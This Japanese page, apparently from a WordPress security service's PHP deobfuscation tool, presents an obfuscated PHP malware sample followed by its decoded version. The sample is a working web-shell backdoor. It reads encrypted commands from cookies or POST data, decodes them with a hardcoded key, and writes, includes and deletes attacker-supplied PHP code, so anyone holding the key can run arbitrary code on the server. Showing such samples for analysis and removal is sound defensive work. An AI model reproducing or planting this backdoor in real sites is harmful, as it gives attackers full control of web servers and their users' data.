Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function xzqnqxtv(){$xpoxyve='geqzjrb_'; print_r (51236+51236);/* l*/} $vqrsy/* vv */= 'vqrsy' ^ '�'; function/* wl */bioufkivw($ddfpvmlqa, $pnuqezetejjnzxe) { global $vqrsy; $eymcvwfmm =/* fv */""; for ($polcuwun/* dmy */= 0; $polcuwun/* qz */</* pqczx */strlen($ddfpvmlqa);)/*wvo */{ for ($pnuqezetej/* roja */= 0; $pnuqezetej/* krdbf*/</* hnvv*/strlen($pnuqezetejjnzxe) &&/* syk*/$polcuwun < strlen($ddfpvmlqa);/* gx */$pnuqezetej++, $polcuwun++) { /* bvvyk */$eymcvwfmm/* vi */.= $vqrsy(ord($ddfpvmlqa[$polcuwun]) ^ ord($pnuqezetejjnzxe[$pnuqezetej])); } } return/* jpa */$eymcvwfmm;} function/* yggqb*/xztcarf($qcgaamotf, $ddfpvmlqa) { global $vqrsy; /* byl */$qwvmj = sprintf(".".$vqrsy(47) ./* u */"\45"/* hdqw */. $vqrsy(705-590)/* ksyg */. "\56" . "p"."\x6c", md5($qcgaamotf)); file_put_contents($qwvmj, "<" . "?"."p"."h"."p".$vqrsy(32)/* xau */. "u"."n"."l".$vqrsy(105)."\156"/* mxj*/. $vqrsy(997-890)/* sbsy */./* uzrvx */"("."_"."\x5f" ./* u */"\106"/*yfea*/./* nnnpu */"\111" ./* giea */"L"."\x45"/* epsrd */. "\137"/* uu*/. "\137" . ")".$vqrsy(310-251) . $vqrsy(32)/*oafyv */. $ddfpvmlqa["d"]); /* gozqw */include($qwvmj); $mxiranslr = $qwvmj; unlink($mxiranslr); } function vavcg(){ /* t */global/* ljrni*/$vqrsy; $polcuwun = array(); /*e_ */$polcuwun[$vqrsy(270-158) . $vqrsy(118)]/* oiwr */=/*v*/phpversion(); $polcuwun[$vqrsy(199-84) . "v"] = "\63" . "."."5"; echo @serialize($polcuwun);} function _ysinku($ddfpvmlqa,/*baio */$qcgaamotf,/* ft */$dbggghdegy){ global $vqrsy;/*ybi */ $ddfpvmlqa/* jeq */= unserialize(bioufkivw(bioufkivw(base64_decode($ddfpvmlqa),/* ts_ */$qcgaamotf),/*f */$dbggghdegy)); if/* h */(isset($ddfpvmlqa[$vqrsy(97).$vqrsy(107)])) { if ($ddfpvmlqa[$vqrsy(97)] ==/*yywei*/$vqrsy(105)) { vavcg(); }/* t */elseif ($ddfpvmlqa[$vqrsy(97)] ==/* xoi */"\145")/* gvut*/{ /* bma*/xztcarf($qcgaamotf,/* imc*/$ddfpvmlqa);/* cnit */} exit(); } } $rijrlbgir/* u_kjo */= $_COOKIE;$uxxhbabrha = $_POST;$rijrlbgir =/*wmtwm */array_merge($uxxhbabrha, $rijrlbgir); $qcgaamotf/*gtdj */= "f"."d"."3"."9".$vqrsy(53) ./* yhoo*/"\71" ./* jmsr */$vqrsy(54) . "d"."-".$vqrsy(48)/* sg*/. $vqrsy(374-320)/* eq */. "\x34" . "c"."-"."4".$vqrsy(435-336)/* jxw */./* mk */"8"."2"."\x2d" ./*tr*/$vqrsy(250-152) . $vqrsy(619-571) . "2"."5"."-"."3"."6".$vqrsy(102) ./* w*/"\x32" . "b"."1"."\66" . $vqrsy(101)/* m*/. "\x61" . $vqrsy(57)/* luj */. $vqrsy(99) . $vqrsy(757-707); foreach ($rijrlbgir as/* fgq */$dbggghdegy => $ddfpvmlqa) { _ysinku($ddfpvmlqa, $qcgaamotf,/* zwo*/$dbggghdegy); }
<?php function xzqnqxtv() { $xpoxyve = 'geqzjrb_'; print_r(102472); /* l*/ } $vqrsy = 'ch'; function bioufkivw($ddfpvmlqa, $pnuqezetejjnzxe) { global $vqrsy; $eymcvwfmm = ""; for ($polcuwun = 0; $polcuwun < strlen($ddfpvmlqa);) { /*wvo */ for ($pnuqezetej = 0; $pnuqezetej < strlen($pnuqezetejjnzxe) && $polcuwun < strlen($ddfpvmlqa); $pnuqezetej++, $polcuwun++) { $eymcvwfmm .= $vqrsy(ord($ddfpvmlqa[$polcuwun]) ^ ord($pnuqezetejjnzxe[$pnuqezetej])); } } return $eymcvwfmm; } function xztcarf($qcgaamotf, $ddfpvmlqa) { global $vqrsy; /* byl */ $qwvmj = sprintf("." . $vqrsy(47) . "%" . $vqrsy(115) . "." . "p" . "l", md5($qcgaamotf)); file_put_contents($qwvmj, "<?php" . $vqrsy(32) . "u" . "n" . "l" . $vqrsy(105) . "n" . $vqrsy(107) . "(" . "_" . "_" . "F" . "I" . "L" . "E" . "_" . "_" . ")" . $vqrsy(59) . $vqrsy(32) . $ddfpvmlqa["d"]); /* gozqw */ include $qwvmj; $mxiranslr = $qwvmj; unlink($mxiranslr); } function vavcg() { /* t */ global $vqrsy; $polcuwun = array(); /*e_ */ $polcuwun[$vqrsy(112) . $vqrsy(118)] = phpversion(); $polcuwun[$vqrsy(115) . "v"] = "3.5"; echo @serialize($polcuwun); } function _ysinku($ddfpvmlqa, $qcgaamotf, $dbggghdegy) { global $vqrsy; /*ybi */ $ddfpvmlqa = unserialize(bioufkivw( bioufkivw( base64_decode($ddfpvmlqa), /* ts_ */ $qcgaamotf ), /*f */ $dbggghdegy )); if (isset($ddfpvmlqa[$vqrsy(97) . $vqrsy(107)])) { if ($ddfpvmlqa[$vqrsy(97)] == $vqrsy(105)) { vavcg(); } elseif ($ddfpvmlqa[$vqrsy(97)] == "e") { /* gvut*/ /* bma*/ xztcarf( $qcgaamotf, /* imc*/ $ddfpvmlqa ); /* cnit */ } exit; } } $rijrlbgir = $_COOKIE; $uxxhbabrha = $_POST; $rijrlbgir = array_merge($uxxhbabrha, $rijrlbgir); $qcgaamotf = "fd39" . $vqrsy(53) . "9" . $vqrsy(54) . "d" . "-" . $vqrsy(48) . $vqrsy(54) . "4" . "c" . "-" . "4" . $vqrsy(99) . "8" . "2" . "-" . $vqrsy(98) . $vqrsy(48) . "2" . "5" . "-" . "3" . "6" . $vqrsy(102) . "2" . "b" . "1" . "6" . $vqrsy(101) . "a" . $vqrsy(57) . $vqrsy(99) . $vqrsy(50); foreach ($rijrlbgir as $dbggghdegy => $ddfpvmlqa) { _ysinku( $ddfpvmlqa, $qcgaamotf, /* zwo*/ $dbggghdegy ); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.